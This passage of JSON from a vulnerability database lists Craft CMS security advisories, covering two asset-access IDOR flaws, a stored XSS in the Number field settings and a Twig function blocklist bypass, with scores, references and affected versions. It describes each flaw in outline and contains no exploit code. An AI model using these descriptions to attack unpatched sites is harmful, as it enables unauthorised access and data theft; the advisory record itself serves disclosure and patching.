E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-17T15:20:18Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-4484-8v2f-5748"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32264","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32264"},{"reference_url":"https://github.com/advisories/GHSA-4484-8v2f-5748","reference_id":"GHSA-4484-8v2f-5748","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-4484-8v2f-5748"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-7jx7-3846-m7w7","reference_id":"GHSA-7jx7-3846-m7w7","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-17T15:20:18Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-7jx7-3846-m7w7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/113014?format=json","purl":"pkg:composer/craftcms/cms@4.17.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.17.5"},{"url":"http://public2.vulnerablecode.io/api/packages/113015?format=json","purl":"pkg:composer/craftcms/cms@5.9.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.11"}],"aliases":["CVE-2026-32264","GHSA-4484-8v2f-5748"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rzq4-h1ms-nqef"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91774?format=json","vulnerability_id":"VCID-sa99-8awj-eycd","summary":"Craft CMS: Authorized asset \"preview file\" requests bypass allows users without asset access to retrieve private preview metadata\n### Summary\n\nAn authenticated low-privileged user can call `assets/preview-file` for an asset they are not authorized to view and still receive preview response data (`previewHtml`) for that private asset.\n\nThe returned preview HTML included a private preview image route containing the target private `assetId`, even though `canView` was `false` for the attacker account.\n\n### Details\n\n1. `assets/preview-file` accepts a maliciously controlled `assetId` and renders preview output.\n2. The action does not enforce per-asset view authorization prior to returning preview content.\n 3. As a result, an authenticated user without asset-view permission can still obtain private preview output.\n\nThis affects Craft installations with authenticated users of mixed privilege levels with private assets.\n\n### Resources\n\n- d30df3112220db1ffd6726a3ed11857014c7fb27\n- b1cddf72c98a","references":[{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"1.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/b1cddf72c98a66801beb04ea4b07e72182b7b7db","reference_id":"","reference_type":"","scores":[{"value":"1.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/commit/b1cddf72c98a66801beb04ea4b07e72182b7b7db"},{"reference_url":"https://github.com/craftcms/cms/commit/d30df3112220db1ffd6726a3ed11857014c7fb27","reference_id":"","reference_type":"","scores":[{"value":"1.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/commit/d30df3112220db1ffd6726a3ed11857014c7fb27"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-44px-qjjc-xrhq","reference_id":"","reference_type":"","scores":[{"value":"1.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-44px-qjjc-xrhq"},{"reference_url":"https://github.com/advisories/GHSA-44px-qjjc-xrhq","reference_id":"GHSA-44px-qjjc-xrhq","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-44px-qjjc-xrhq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/113239?format=json","purl":"pkg:composer/craftcms/cms@4.17.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-gzry-xtu5-ukhu"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.17.8"},{"url":"http://public2.vulnerablecode.io/api/packages/113238?format=json","purl":"pkg:composer/craftcms/cms@5.9.14","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-gzry-xtu5-ukhu"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.14"}],"aliases":["GHSA-44px-qjjc-xrhq"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-sa99-8awj-eycd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50073?format=json","vulnerability_id":"VCID-twuy-wzb7-k7g3","summary":"Craft CMS Vulnerable to Stored XSS in Number Prefix & Suffix Fields\nA stored XSS vulnerability exists in the Number field type settings. The Prefix and Suffix fields are rendered using the `|md|raw` Twig filter without proper escaping, allowing script execution when the Number field is displayed on users' profiles.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25496","reference_id":"","reference_type":"","scores":[{"value":"0.00023","scoring_system":"epss","scoring_elements":"0.06648","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25496"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/cb5fb0e979e72f315c9178fc031883d49527f513","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:30:19Z/"}],"url":"https://github.com/craftcms/cms/commit/cb5fb0e979e72f315c9178fc031883d49527f513"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/4.16.18","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/releases/tag/4.16.18"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.8.22","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:30:19Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/5.8.22"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25496","reference_id":"CVE-2026-25496","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25496"},{"reference_url":"https://github.com/advisories/GHSA-9f5h-mmq6-2x78","reference_id":"GHSA-9f5h-mmq6-2x78","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9f5h-mmq6-2x78"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-9f5h-mmq6-2x78","reference_id":"GHSA-9f5h-mmq6-2x78","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:30:19Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-9f5h-mmq6-2x78"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73947?format=json","purl":"pkg:composer/craftcms/cms@4.16.18","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.16.18"},{"url":"http://public2.vulnerablecode.io/api/packages/73946?format=json","purl":"pkg:composer/craftcms/cms@5.8.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.22"}],"aliases":["CVE-2026-25496","GHSA-9f5h-mmq6-2x78"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-twuy-wzb7-k7g3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91375?format=json","vulnerability_id":"VCID-tzjk-x116-ayge","summary":"Craft CMS: Low-privilege users could read private asset contents when editing an asset (IDOR)\n### Summary\n\nA low-privileged authenticated user can read private asset content by calling `assets/edit-image` with an arbitrary `assetId` that they are not authorized to view.\n\nThe endpoint returns image bytes (or a preview redirect) without enforcing a per-asset view authorization check, leading to potential unauthorized disclosure of private files.\n\n### Details\n\nRoot cause:\n  - A user-controlled object reference (`assetId`) is used to load and return sensitive content.\n  - The action does not verify whether the current user is authorized to view that asset.\n  - This creates an authenticated IDOR / authorization bypass.\n\n### Impact\n\n- Craft installations where private/non-public assets exist and low-privileged users can authenticate.\n\n## Resources\n\nhttps://github.com/craftcms/cms/commit/7290d91639e","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33158","reference_id":"","reference_type":"","scores":[{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.0389","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33158"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/7290d91639e5e3a4f7e221dfbef95c9b77331860","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T20:24:35Z/"}],"url":"https://github.com/craftcms/cms/commit/7290d91639e5e3a4f7e221dfbef95c9b77331860"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/4.17.8","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T20:24:35Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/4.17.8"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.9.14","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T20:24:35Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/5.9.14"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-3pvf-vxrv-hh9c","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T20:24:35Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-3pvf-vxrv-hh9c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33158","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33158"},{"reference_url":"https://github.com/advisories/GHSA-3pvf-vxrv-hh9c","reference_id":"GHSA-3pvf-vxrv-hh9c","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-3pvf-vxrv-hh9c"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/113239?format=json","purl":"pkg:composer/craftcms/cms@4.17.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-gzry-xtu5-ukhu"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.17.8"},{"url":"http://public2.vulnerablecode.io/api/packages/113238?format=json","purl":"pkg:composer/craftcms/cms@5.9.14","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-gzry-xtu5-ukhu"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.14"}],"aliases":["CVE-2026-33158","GHSA-3pvf-vxrv-hh9c"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-tzjk-x116-ayge"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50545?format=json","vulnerability_id":"VCID-vasz-rnn1-67ev","summary":"Craft CMS has Twig Function Blocklist Bypass\nCraft CMS implements a blocklist to prevent potentially dangerous PHP functions from being called via Twig non-Closure arrow functions.\n\nIn order to be able to successfully execute this attack, you need to either have `allowAdminChanges` enabled on production, or a compromised admin account, or an account with access to the System Messages utility.\n\nSeveral PHP functions are not included in the blocklist, which could allow malicious actors with the required permissions to execute various types of payloads, including RCEs, arbitrary file reads, SSRFs, and SSTIs.\n\nTwig has already deprecated this behavior, and it will eventually be removed from Twig altogether.\n\nhttps://github.com/twigphp/Twig/blob/946ddeafa3c9f4ce279d1f34051af041db0e16f2/src/Extension/CoreExtension.php#L2096\n\nThis has been resolved in Craft 4.17.0 and 5.9.0, which removes the blocklist and disables all non-Clousure arrow functions in Twig globally via the `enableTwigSandbox` config setting. That setting is enabled by default on all new Craft projects. Existing Craft projects will need to enable the config setting to take advantage of it.\n\nExisting projects should update to the patched versions of 5.9.0 and 4.17.0 to mitigate the issue and enable the config setting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28783","reference_id":"","reference_type":"","scores":[{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11182","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28783"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/pull/18208","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-04T17:33:33Z/"}],"url":"https://github.com/craftcms/cms/pull/18208"},{"reference_url":"https://github.com/twigphp/Twig/blob/946ddeafa3c9f4ce279d1f34051af041db0e16f2/src/Extension/CoreExtension.php#L2096","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/twigphp/Twig/blob/946ddeafa3c9f4ce279d1f34051af041db0e16f2/src/Extension/CoreExtension.php#L2096"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28783","reference_id":"CVE-2026-28783","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28783"},{"reference_url":"https://github.com/advisories/GHSA-5fvc-7894-ghp4","reference_id":"GHSA-5fvc-7894-ghp4","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5fvc-7894-ghp4"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-5fvc-7894-ghp4","reference_id":"GHSA-5fvc-7894-ghp4","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-04T17:33:33Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-5fvc-7894-ghp4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73953?format=json","purl":"pkg:composer/craftcms/cms@4.17.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.17.0-beta.1"},{"url":"http://public2.vulnerablecode.io/api/packages/73952?format=json","purl":"pkg:composer/craftcms/cms@5.9.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-6ban-jvfq-w3at"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.0-beta.1"}],"aliases":["CVE-2026-28783","GHSA-5fvc-7894-ghp4"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabili